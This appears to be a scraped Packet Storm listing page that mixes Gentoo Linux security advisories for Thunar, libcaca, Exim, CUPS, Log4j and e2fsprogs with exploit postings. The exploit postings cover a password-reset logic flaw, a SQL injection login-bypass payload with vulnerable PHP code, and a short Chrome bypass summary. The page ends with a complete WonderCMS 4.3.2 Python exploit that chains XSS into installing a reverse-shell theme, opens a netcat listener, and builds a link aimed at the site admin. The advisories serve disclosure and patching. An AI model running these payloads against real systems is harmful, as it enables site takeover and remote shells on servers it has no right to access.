Gentoo Linux Security Advisory 202402-20 - A vulnerability has been discovered in Thunar which may lead to arbitrary code execution Versions greater than or equal to 4.17.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Thunar: Arbitrary Code Execution  
     Date: February 18, 2024  
     Bugs: #789396  
       ID: 202402-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Thunar which may lead to  
arbitrary code execution

Background  
==========

Thunar is a modern file manager for the Xfce Desktop Environment. Thunar  
has been designed from the ground up to be fast and easy to use. Its  
user interface is clean and intuitive and does not include any confusing  
or useless options by default. Thunar starts up quickly and navigating  
through files and folders is fast and responsive.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
xfce-base/thunar  < 4.17.3      >= 4.17.3

Description  
===========

A vulnerability has been discovered in Thunar. Please review the CVE  
identifier referenced below for details.

Impact  
======

When called with a regular file as command line argument, Thunar  
would delegate to some other program without user confirmation  
based on the file type. This could be exploited to trigger code  
execution in a chain of vulnerabilities.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Thunar users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=xfce-base/thunar-4.17.3"

References  
==========

[ 1 ] CVE-2021-32563  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32563

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-20

Online Library Management System version 3 suffers from a password reset vulnerability due to a logic flaw of allowing the same email address to be set for multiple users.

    # Exploit Title: Online Library Management System v3 - Password Reset and Email Matching Vulnerability# Date: 12.09.2023# Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/online-library-management-system/# Version: v3# Tested on: Windows 10 Pro 64 Bit  + Wampserver V3.3# CVE: N/A## Description:This report outlines a security vulnerability present in the web application called [Application Name]. This vulnerability allows users to create multiple accounts with the same email address and use that email address during the password reset process. This situation can compromise the security of user accounts.## Risk Level:This vulnerability can lead to serious security risks, including unauthorized access to user accounts and identity theft. It has the potential to have a significant impact.## Step-by-Step Description:1. User creates an account as "user1," with the email address set as "user@gmail.com."2. User creates another account as "user2" and uses the same email address, "user@gmail.com."3. User2 initiates a password reset process when forgetting the password.4. As a result of the password reset process, the password for the "user1" account is also reset and can be controlled by "user2."

Online Library Management System 3 Password Reset

Gentoo Linux Security Advisory 202402-19 - A vulnerability has been discovered in libcaca which can lead to arbitrary code execution. Versions greater than or equal to 0.99_beta19-r4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libcaca: Arbitary Code Execution  
     Date: February 18, 2024  
     Bugs: #772317  
       ID: 202402-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in libcaca which can lead to  
arbitrary code execution.

Background  
==========

libcaca is a library that creates colored ASCII-art graphics.

Affected packages  
=================

Package             Vulnerable        Unaffected  
------------------  ----------------  -----------------  
media-libs/libcaca  < 0.99_beta19-r4  >= 0.99_beta19-r4

Description  
===========

A vulnerability has been discovered in libcaca. Please review the CVE  
identifier referenced below for details.

Impact  
======

A buffer overflow issue in caca_resize function in libcaca/caca/canvas.c  
may lead to local execution of arbitrary code in the user context.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libcaca users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libcaca-0.99_beta19-r4"

References  
==========

[ 1 ] CVE-2021-3410  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3410

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-19

Gentoo Linux Security Advisory 202402-18 - Multiple vulnerabilities have been discovered in Exim, the worst of which can lead to remote code execution. Versions greater than or equal to 4.97.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Exim: Multiple Vulnerabilities  
     Date: February 18, 2024  
     Bugs: #914923, #921520  
       ID: 202402-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Exim, the worst of  
which can lead to remote code execution.

Background  
==========

Exim is a message transfer agent (MTA) designed to be a a highly  
configurable, drop-in replacement for sendmail.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
mail-mta/exim  < 4.97.1      >= 4.97.1

Description  
===========

Multiple vulnerabilities have been discovered in Exim. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Exim users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-mta/exim-4.97.1"

References  
==========

[ 1 ] CVE-2023-42114  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42114  
[ 2 ] CVE-2023-42115  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42115  
[ 3 ] CVE-2023-42116  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42116  
[ 4 ] CVE-2023-42117  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42117  
[ 5 ] CVE-2023-42119  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42119  
[ 6 ] CVE-2023-51766  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51766  
[ 7 ] ZDI-CAN-17433  
[ 8 ] ZDI-CAN-17434  
[ 9 ] ZDI-CAN-17515  
[ 10 ] ZDI-CAN-17554  
[ 11 ] ZDI-CAN-17643

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-18

Gentoo Linux Security Advisory 202402-17 - Multiple vulnerabilities have been discovered in CUPS, the worst of which can lead to arbitrary code execution. Versions greater than or equal to 2.4.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: CUPS: Multiple Vulnerabilities  
     Date: February 18, 2024  
     Bugs: #847625, #907675, #909018, #914781  
       ID: 202402-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in CUPS, the worst of  
which can lead to arbitrary code execution.

Background  
==========

CUPS, the Common Unix Printing System, is a full-featured print server.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
net-print/cups  < 2.4.7       >= 2.4.7

Description  
===========

Multiple vulnerabilities have been discovered in CUPS. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All CUPS users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-print/cups-2.4.7"

References  
==========

[ 1 ] CVE-2022-26691  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26691  
[ 2 ] CVE-2023-4504  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4504  
[ 3 ] CVE-2023-32324  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32324  
[ 4 ] CVE-2023-34241  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34241

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-17

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

Chrome has an issue where the chrome.pageCapture.saveAsMHTML() extension API can be used on blocked origins due to a racy access check.

Chrome chrome.pageCapture.saveAsMHTML() Extension API Blocked Origin Bypass

Gentoo Linux Security Advisory 202402-16 - Multiple vulnerabilities have been discovered in Apache Log4j, the worst of which can lead to remote code execution. Versions less than or equal to 1.2.17 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Apache Log4j: Multiple Vulnerabilities  
     Date: February 18, 2024  
     Bugs: #719146  
       ID: 202402-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Apache Log4j, the worst  
of which can lead to remote code execution.

Background  
==========

Log4j is a Java logging framework that supports various use cases with a  
rich set of components, a separate API, and a performance-optimized  
implementation.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-java/log4j  <= 1.2.17     Vulnerable!

Description  
===========

Multiple vulnerabilities hav been discovered in Apache Log4j. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for log4j. We recommend that users  
unmerge it:

  # emerge --ask --depclean "dev-java/log4j"

References  
==========

[ 1 ] CVE-2019-17571  
      https://nvd.nist.gov/vuln/detail/CVE-2019-17571  
[ 2 ] CVE-2020-9488  
      https://nvd.nist.gov/vuln/detail/CVE-2020-9488  
[ 3 ] CVE-2020-9493  
      https://nvd.nist.gov/vuln/detail/CVE-2020-9493  
[ 4 ] CVE-2022-23302  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23302  
[ 5 ] CVE-2022-23305  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23305

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-16

Gentoo Linux Security Advisory 202402-15 - A vulnerability has been discovered in e2fsprogs which can lead to arbitrary code execution. Versions greater than or equal to 1.46.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: e2fsprogs: Arbitrary Code Execution  
     Date: February 18, 2024  
     Bugs: #838388  
       ID: 202402-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in e2fsprogs which can lead to  
arbitrary code execution.

Background  
==========

e2fsprogs is a set of utilities for maintaining the ext2, ext3 and ext4  
file systems.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-fs/e2fsprogs  < 1.46.6      >= 1.46.6

Description  
===========

Multiple vulnerabilities have been discovered in e2fsprogs. Please  
review the CVE identifiers referenced below for details.

Impact  
======

An out-of-bounds read/write vulnerability was found in e2fsprogs. This  
issue leads to a segmentation fault and possibly arbitrary code  
execution via a specially crafted filesystem.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All e2fsprogs users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-fs/e2fsprogs-1.46.6"

References  
==========

[ 1 ] CVE-2022-1304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1304

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-15

WonderCMS version 4.3.2 remote exploit that leverages cross site scripting to achieve remote code execution.

    # Author: prodigiousMind# Exploit: Wondercms 4.3.2 XSS to RCEimport sysimport requestsimport osimport bs4if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")else:  data = '''var url = "'''+str(sys.argv[1])+'''";if (url.endsWith("/")) { url = url.slice(0, -1);}var urlWithoutLog = url.split("/").slice(0, -1).join("/");var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value;var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;var xhr3 = new XMLHttpRequest();xhr3.withCredentials = true;xhr3.open("GET", urlRev);xhr3.send();xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();            }   }; }};'''  try:    open("xss.js","w").write(data)    print("[+] xss.js is created")    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))    print("----------------------------\n")    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""    XSSlink = XSSlink.strip(" ")    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)    print("----------------------------\n")    print("\nstarting HTTP server to allow the access to xss.js")    os.system("python3 -m http.server\n")  except: print(data,"\n","//write this to a file")

Source

Packet Storm